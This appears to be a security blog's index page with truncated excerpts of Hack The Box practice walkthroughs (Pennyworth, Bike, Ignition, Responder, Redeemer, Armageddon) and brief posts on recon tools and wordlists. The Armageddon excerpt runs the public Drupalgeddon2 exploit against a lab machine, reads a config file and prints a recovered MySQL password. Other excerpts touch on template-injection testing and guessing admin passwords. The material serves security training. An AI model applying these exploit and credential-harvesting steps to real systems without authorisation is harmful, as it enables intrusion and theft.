HTB Pennyworth

We continue with another very easy HTB box.

$ nmap -p- 10.129.243.77 -sV --min-rate 5000

Here we have Jetty 9.4.39.v20210325. Jetty provides a web server and servlet container, additionally providing support for HTTP/2, WebSocket, OSGi, JMX, JNDI, JAAS and many other integrations. https://www.eclipse.org/jetty/

If we go to http://10.129.243.77:8080, we’ll be redirected to http://10.129.243.77:8080/login?from=%2F. This is a Jenkins server. Leading open source automation server, Jenkins provides hundreds of plugins

HTB Bike

This is another of the HTB Starting Point’s very easy boxes.

$ nmap -v -p- -sV 10.129.237.207 --min-rate 5000

Access to http://10.129.237.207/

According to the Nmap scan, the site runs under node.js. Wappalyzer describes the Web Framework as Express. There is no validation of the email address input: in fact, it seems that any input is reflected in the result. If we check for Server-Side Template Injection: The template engine

HTB Ignition

This is another of the very easy HTB Starting Point boxes.

$ sudo nano /etc/hosts
$ nmap -p- -A 10.129.232.211 -sV

Access to http://ignition.htb/

$ dirsearch -u http://ignition.htb -i 200

Access to http://ignition.htb/admin/

Based on the HTB questions, the username is admin. As there is a form_key parameter, it is more difficult to brute-force. So, we can try to guess the password manually using the most usual passwords. We can find more

HTB Responder

This is another of the HTB Starting Point boxes classified as very easy.

$ nmap -p- --min-rate 5000 10.129.225.204 --open -v

If we try to access http://10.129.225.204 we’ll be redirected to http://unika.htb, but we can’t see the site. So, let’s add it to our /etc/hosts. Now we’ll obtain the correct site:

$ whatweb http://unika.htb

Here we can see that this site runs with PHP, over a Windows Apache web server. Checking

HTB Redeemer

This is one of the Starting Point HTB boxes. It is rated as very easy and only has 1 flag.

$ nmap -p- -A 10.129.216.146 --min-rate 5000

So, we are facing a Redis v5.0.7 instance. According to its site: Redis is an open source (BSD licensed), in-memory data structure store used as a database, cache, message broker, and streaming engine. Redis provides data structures such as strings, hashes, lists, sets,

HTB Armageddon

$ nmap -v -p- -A 10.10.10.233 --min-rate 5000

Site inspection: http://10.10.10.233/

$ whatweb http://10.10.10.233

We are facing a Drupal 7 CMS.

$ dirsearch -u http://10.10.10.233/ -i 200

http://10.10.10.233/includes/bootstrap.inc

Specifically, it is Drupal v7.56. Let’s see if this Drupal version has some vulnerability. CVE-2018-7600: https://github.com/dreadlocked/Drupalgeddon2

$ git clone https://github.com/dreadlocked/Drupalgeddon2.git
$ ruby drupalgeddon2.rb http://10.10.10.233
armageddon.htb>> whoami
armageddon.htb>> pwd
armageddon.htb>> ls /var/www/html/sites -la
armageddon.htb>> ls /var/www/html/sites/default -la
armageddon.htb>> cat /var/www/html/sites/default/settings.php

MySQL password = CQHEy@9M*m23gBVj

reNgine: A brief overview

reNgine is a very complete recon tool that can be very helpful to centralize all your recon in one site. Its main website defines it as: «The only web application recon tool you will ever need!» Currently it is capable of performing: Subdomain Discovery, Vulnerability Detection, IPs and Open Ports Identification, Directory and files fuzzing, Screenshot Gathering, Endpoints Gathering, OSINT. Although reNgine can be installed in a local machine, it is

Script to update go version

Although Go installation is a pretty straightforward process, it can be done even more easily if a script is used to install and update your Go installation. We are going to use the update-golang script.

$ go version
$ git clone https://github.com/udhos/update-golang.git
$ sudo ./update-golang.sh
$ go version

To finish the setup, the shell PATH should be updated. The path ‘/usr/local/go/bin’ is added to PATH using ‘/etc/profile.d/golang_path.sh’. Only if needed, GOROOT is

Wordlists for your daily work

When we do pentesting and bug bounty, the most important phase is always recon, and one of the most important elements of your recon is the wordlist. It is said that «Your recon is as good as your wordlist is». In Kali Linux, there are by default several good wordlists at /usr/share/wordlists:

$ cd /usr/share/wordlists
dirb dirbuster fasttrack.txt fern-wifi metasploit nmap.lst rockyou.txt wfuzz

While dirb, dirbuster and wfuzz can

FinalRecon (web reconnaissance tool)

As it is described on its website: FinalRecon is an automatic web reconnaissance tool written in Python. The goal of FinalRecon is to provide an overview of the target in a short amount of time while maintaining the accuracy of results. Instead of executing several tools one after another, it can provide similar results while keeping dependencies small and simple. https://github.com/cbk914/finalrecon

Installation
$ sudo apt install finalrecon

Usage
$ finalrecon.py <arguments> url